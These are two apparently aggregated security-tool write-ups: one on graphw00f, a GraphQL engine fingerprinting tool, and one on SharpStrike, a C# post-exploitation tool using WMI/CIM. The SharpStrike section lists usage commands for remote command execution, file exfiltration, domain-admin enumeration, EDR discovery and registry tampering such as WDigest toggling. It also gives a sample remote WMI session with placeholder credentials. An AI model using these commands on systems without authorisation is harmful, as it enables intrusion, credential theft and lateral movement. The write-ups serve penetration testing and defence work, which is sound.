graphw00f (inspired by wafw00f) is a GraphQL fingerprinting tool for GQL endpoints. It sends a mix of benign and malformed queries to determine the GraphQL engine running behind the scenes. graphw00f also provides insights into what security defences each technology provides out of the box, and whether they are on or off by default.

Specially crafted queries cause different GraphQL server implementations to respond uniquely to queries, mutations and subscriptions; this makes it trivial to fingerprint the backend engine and distinguish between the various GraphQL implementations. (CWE-200)
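
A minimal sketch of the technique: send a deliberately malformed query and compare the engine's error wording against known markers. The marker strings below are illustrative examples, not graphw00f's actual detection rules:

# Illustrative fingerprint probe; marker strings are examples, not graphw00f's rules.
import requests

MARKERS = {
    "Syntax Error GraphQL": "graphql-core based engine (e.g. Graphene)",
    "Syntax Error: Unexpected Name": "graphql-js based engine (e.g. Apollo)",
}

def probe(url):
    # "queryy" is intentionally malformed to force a parse error.
    resp = requests.post(url, json={"query": "queryy { __typename }"}, timeout=5)
    errors = " ".join(e.get("message", "")
                      for e in resp.json().get("errors", []))
    for marker, engine in MARKERS.items():
        if marker in errors:
            return engine
    return "unknown engine"

print(probe("http://127.0.0.1:5000/graphql"))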


Detections

graphw00f currently attempts to discover the following GraphQL engines:

  • Graphene - Python
  • Ariadne - Python
  • Apollo - TypeScript
  • graphql-go - Go
  • gqlgen - Go
  • WPGraphQL - PHP
  • GraphQL API for Wordpress - PHP
  • graphql-ruby - Ruby
  • graphql-php - PHP
  • Hasura - Haskell
  • HyperGraphQL - Java
  • graphql-java - Java
  • Juniper - Rust
  • Sangria - Scala
  • Flutter - Dart
  • Diana.jl - Julia
  • Strawberry - Python
  • Tartiflette - Python

GraphQL Technologies Defence Matrices

Each fingerprinted technology (e.g. Graphene, Ariadne, ...) has an associated document (example for graphene) which covers the security defence mechanisms the specific technology supports, giving a better idea of how the implementation may be attacked.

| Field Suggestions | Query Depth Limit | Query Cost Analysis | Automatic Persisted Queries | Introspection      | Debug Mode | Batch Requests  |
|-------------------|-------------------|---------------------|-----------------------------|--------------------|------------|-----------------|
| On by Default | No Support | No Support | No Support | Enabled by Default | N/A | Off by Default |

Prerequisites
  • python3
  • requests

Installation

Clone Repository

git clone git@github.com:dolevf/graphw00f.git


Run graphw00f

python3 main.py -h

Usage: main.py -h

Options:
-h, --help show this help message and exit
-r, --noredirect Do not follow redirections given by 3xx responses
-t URL, --target=URL target url with the path
-o OUTPUT_FILE, --output-file=OUTPUT_FILE
Output results to a file (CSV)
-l, --list List all GraphQL technologies graphw00f is able to
detect
-v, --version Print out the current version and exit.

Example
python3 main.py -t http://127.0.0.1:5000/graphql

+-------------------+
| graphw00f |
+-------------------+
*** ***
** ***
** **
+--------------+ +--------------+
| Node X | | Node Y |
+--------------+ +--------------+
*** ***
** **
** **
+------------+
| Node Z |
+------------+

graphw00f - v1.0.0
The fingerprinting tool for GraphQL

[*] Checking if GraphQL is available at https://demo.hypergraphql.org:8484/graphql...
[*] Found GraphQL...
[*] Attempting to fingerprint...
[*] Discovered GraphQL Engine: (HyperGraphQL)
[!] Attack Surface Matrix: https://github.com/dolevf/graphw00f/blob/main/docs/hypergraphql.md
[!] Technologies: Java
[!] Homepage: https://www.hypergraphql.org
[*] Completed.

Support and Issues

For any issues with graphw00f (false positives, inaccurate detections, bugs, etc.), please create a GitHub issue with environment details.


Resources

Want to learn more about GraphQL? Head over to my other project and hack GraphQL away: Damn Vulnerable GraphQL Application



SharpStrike - A Post-Exploitation Tool Written In C# That Uses Either CIM Or WMI To Query Remote Systems

8 September 2021 at 20:30
By: Zion3R


SharpStrike is a post-exploitation tool written in C# that uses either CIM or WMI to query remote systems. It can use provided credentials or the current user's session.

Note: Some commands will use PowerShell in combination with WMI, denoted with ** in the --show-commands command.


Introduction

SharpStrike is a C# rewrite and expansion on @Matt_Grandy_'s CIMplant and @christruncer's WMImplant.

SharpStrike allows you to gather data about a remote system, execute commands, exfil data, and more. The tool allows connections using Windows Management Instrumentation (WMI) or the Common Information Model (CIM); more accurately, Windows Management Infrastructure (MI). SharpStrike requires local administrator permissions on the target system.
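
SharpStrike itself is C#, but the underlying mechanic (authenticating to a remote host's WMI service and querying its classes) can be pictured in a few lines of Python using Tim Golden's wmi package (pip install wmi; Windows only). This is an analogy for illustration, not SharpStrike's code; the host and credentials below are placeholders:

# Python analogy (Windows only; pip install wmi) of the remote WMI session
# SharpStrike establishes in C#. Host and credentials are placeholders.
import wmi

conn = wmi.WMI(computer="10.0.0.5",
               user=r"DOMAIN\operator",
               password="Sup3rSecret!")

# Comparable in spirit to the 'ps' command: list remote processes.
for proc in conn.Win32_Process():
    print(proc.ProcessId, proc.Name)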


Setup:

It's probably easiest to use the pre-built version under Releases; just note that it is compiled in Debug mode. If you want to build the solution yourself, follow the steps below.

  1. Load SharpStrike.sln into Visual Studio
  2. Go to Build at the top and then Build Solution if no modifications are wanted

The Build will produce two versions of SharpStrike: GUI (WinForms) & Console application. Each version implements the same features.


Usage
Console Version:

SharpStrike.exe --help
SharpStrike.exe --show-commands
SharpStrike.exe --show-examples
SharpStrike.exe -c ls_domain_admins
SharpStrike.exe -c ls_domain_users_list
SharpStrike.exe -c cat -f "c:\users\user\desktop\file.txt" -s [remote IP address]
SharpStrike.exe -c cat -f "c:\users\user\desktop\file.txt" -s [remote IP address] -u [username] -d [domain] -p [password] -c
SharpStrike.exe -c command_exec -e "quser" -s [remote IP address] -u [username] -d [domain] -p [password]

GUI version:

show-commands
show-examples
ls_domain_admins
ls_domain_users_list
cat -f "c:\users\user\desktop\file.txt" -s [remote IP address]
cat -f "c:\users\user\desktop\file.txt" -s [remote IP address] -u [username] -d [domain] -p [password]
command_exec -e "quser" [remote IP address] -u [username] -d [domain] -p [password]

Functions

File Operations:
cat                          -  Reads the contents of a file
copy - Copies a file from one location to another
download** - Download a file from the targeted machine
ls - File/Directory listing of a specific directory
search - Search for a file in a user-specified directory
upload** - Upload a file to the targeted machine

Lateral Movement Facilitation
command_exec**               -  Run a command line command and receive the output. Run with nops flag to disable PowerShell
disable_wdigest - Sets the registry value for UseLogonCredential to zero
enable_wdigest - Adds registry value UseLogonCredential
disable_winrm** - Disables WinRM on the targeted system
enable_winrm** - Enables WinRM on the targeted system
reg_mod - Modify the registry on the targeted machine
reg_create - Create the registry value on the targeted machine
reg_delete - Delete the registry on the targeted machine
remote_posh** - Run a PowerShell script on a remote machine and receive the output
sched_job - Not implemented due to Win32_ScheduledJobs accessing an outdated API
service_mod - Create, delete, or modify system services
ls_domain_users*** - List domain users
ls_domain_users_list*** - List domain users sAMAccountName
ls_domain_users_email*** - List domain users email address
ls_domain_groups*** - List domain user groups
ls_domain_admins*** - List domain admin users
ls_user_groups*** - List domain user with their associated groups
ls_computers*** - List computers on current domain

Process Operations
process_kill                 -  Kill a process via name or process id on the targeted machine
process_start - Start a process on the targeted machine
ps - Process listing

System Operations
active_users                 -  List domain users with active processes on the targeted system
basic_info - Used to enumerate basic metadata about the targeted system
drive_list - List local and network drives
share_list - List network shares
ifconfig - Receive IP info from NICs with active network connections
installed_programs - Receive a list of the installed programs on the targeted machine
logoff - Log users off the targeted machine
reboot (or restart) - Reboot the targeted machine
power_off (or shutdown) - Power off the targeted machine
vacant_system - Determine if a user is away from the system
edr_query - Query the local or remote system for EDR vendors

Log Operations
logon_events                 -  Identify users that have logged onto a system

* All PowerShell can be disabled by using the --nops flag, although some commands will not execute (upload/download, enable/disable WinRM)
** Denotes PowerShell usage (either using a PowerShell Runspace or through Win32_Process::Create method)
*** Denotes LDAP usage - "root\directory\ldap" namespace

Some Example Usage Commands

(Screenshots of the console and GUI versions of SharpStrike appear in the original post.)
Solution Architecture

SharpStrike is composed of three main projects

  1. ServiceLayer -- Provides core functionality and is consumed by the UI layer
  2. Models -- Contains types, shared across all projects
  3. User Interface -- GUI/Console

ServiceLayer
  1. Connector.cs

This is where the initial CIM/WMI connections are made and passed to the rest of the application.

  2. ExecuteWMI.cs

All function code for the WMI commands.

  3. ExecuteCIM.cs

All function code for the CIM (MI) commands.


Read more

CIMplant Part 1: Detection of a C# Implementation of WMImplant

WMImplant – A WMI Based Agentless Post-Exploitation RAT Developed in PowerShell

SharpStrike | Post-exploitation tool | CIM & WMI Inside


